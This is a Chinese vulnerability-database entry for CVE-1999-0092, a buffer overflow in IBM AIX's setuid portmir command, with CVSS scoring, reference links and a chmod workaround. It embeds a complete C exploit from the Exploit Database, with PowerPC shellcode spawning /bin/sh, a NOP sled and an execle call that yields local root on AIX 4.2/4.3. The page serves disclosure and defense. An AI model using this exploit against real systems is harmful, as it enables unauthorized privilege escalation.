CVE-1999-0092
CVSS7.2
发布时间 :1997-10-29 00:00:00
修订时间 :2008-09-09 08:33:41
NMCOE    

[原文]Various vulnerabilities in the AIX portmir command allows local users to obtain root access.


[CNNVD]AIX portmir命令权限许可漏洞(CNNVD-199710-026)

        AIX portmir命令中存在多种漏洞。本地用户可以获得根使用权。

- CVSS (基础分值)

CVSS分值: 7.2 [严重(HIGH)]
机密性影响: COMPLETE [完全的信息泄露导致所有系统文件暴露]
完整性影响: COMPLETE [系统完整性可被完全破坏]
可用性影响: COMPLETE [可能导致系统完全宕机]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: LOCAL [漏洞利用需要具有物理访问权限或本地帐户]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

产品及版本信息(CPE)暂不可用

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0092
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-1999-0092
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-199710-026
(官方数据源) CNNVD

- 其它链接及资源

- 漏洞信息

AIX portmir命令权限许可漏洞
高危 未知
1997-10-29 00:00:00 2005-10-20 00:00:00
本地  
        AIX portmir命令中存在多种漏洞。本地用户可以获得根使用权。

- 公告与补丁

        

- 漏洞信息 (19306)

IBM AIX 4.2.1 portmir Buffer Overflow & Insecure Temporary File Creation Vulnerabilities (EDBID:19306)
aix local
1997-10-29 Verified
0 BM ERS Team
N/A [点击下载]
source: http://www.securityfocus.com/bid/385/info

AIX version 4.2.1 introduced a new command titled 'portmir'. This new program had two notable vulnerabilites. First it contained a buffer overflow which allowed malicious users to obtain root privileges. Secondly it wrote it's log files to a world readable directly thereby exposing security relavent information. 

/*## copyright LAST STAGE OF DELIRIUM oct 2000 poland        *://lsd-pl.net/ #*/
/*## /usr/bin/portmir                                                        #*/

/*   note: to avoid potential system hang-up please, first obtain the exact   */
/*   AIX OS level with the use of the uname -a or oslevel commands            */

#define ADRNUM 400
#define NOPNUM 16000
#define ALLIGN 2

char shellcode[]=
    "\x7c\xa5\x2a\x79"     /* xor.    r5,r5,r5               */
    "\x40\x82\xff\xfd"     /* bnel    <shellcode>            */
    "\x7f\xe8\x02\xa6"     /* mflr    r31                    */
    "\x3b\xff\x01\x20"     /* cal     r31,0x120(r31)         */
    "\x38\x7f\xff\x08"     /* cal     r3,-248(r31)           */
    "\x38\x9f\xff\x10"     /* cal     r4,-240(r31)           */
    "\x90\x7f\xff\x10"     /* st      r3,-240(r31)           */
    "\x90\xbf\xff\x14"     /* st      r5,-236(r31)           */
    "\x88\x5f\xff\x0f"     /* lbz     r2,-241(r31)           */
    "\x98\xbf\xff\x0f"     /* stb     r5,-241(r31)           */
    "\x4c\xc6\x33\x42"     /* crorc   cr6,cr6,cr6            */
    "\x44\xff\xff\x02"     /* svca                           */
    "/bin/sh\xff"
;

char nop[]="\x7f\xff\xfb\x78";

main(int argc,char **argv,char **e){
    char buffer[20000],adr[4],*b,*envp[2];
    int i;

    printf("copyright LAST STAGE OF DELIRIUM oct 2000 poland  //lsd-pl.net/\n");
    printf("/usr/sbin/portmir for aix 4.2 4.3 4.3.x PowerPC/POWER\n\n");

    if(argc<2){
        printf("usage: %s 42|43|433\n",argv[0]);exit(-1);
    }

    switch(atoi(argv[1])){
    case  42: shellcode[55]=0x02; break;
    case  43: shellcode[55]=0x04; break;
    case 433: shellcode[55]=0x03; break;
    default: exit(-1);
    }

    i=0; while(*e++) i+=strlen(*e)+1;
    *((unsigned long*)adr)=(unsigned long)e+(i&~3)-8000;

    envp[0]=&buffer[1000];
    envp[1]=0;

    b=buffer;
    for(i=0;i<ALLIGN;i++) *b++=adr[i%4];
    for(i=0;i<ADRNUM;i++) *b++=adr[i%4];
    *b=0;

    b=&buffer[1000];
    sprintf(b,"xxx=");b+=4;
    for(i=0;i<ALLIGN;i++) *b++=' ';
    for(i=0;i<NOPNUM;i++) *b++=nop[i%4];
    for(i=0;i<strlen(shellcode);i++) *b++=shellcode[i];
    *b=0;

    execle("/usr/sbin/portmir","lsd","-t",buffer,0,envp);
}

		

- 漏洞信息

5801
IBM AIX portmir Local Privilege Escalation Overflow
Local Access Required Input Manipulation
Loss of Integrity
Exploit Public

- 漏洞描述

IBM AIX contains a flaw that may allow a malicious user to gain access to unauthorized privileges. The issue is triggered when a malicious user overflows a buffer in its portmir command, typically via assembly language instructions coded in an exploit written in the c programming language. This flaw may lead to a loss of Integrity.

- 时间线

1997-10-29 Unknow
Unknow Unknow

- 解决方案

Currently, there are no known upgrades to correct this issue. It is possible to correct the flaw by implementing the following workaround: disable the setuid bit on the portmir command. #chmod u-s /usr/sbin/portmir

- 相关参考

- 漏洞作者

Unknown or Incomplete
 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站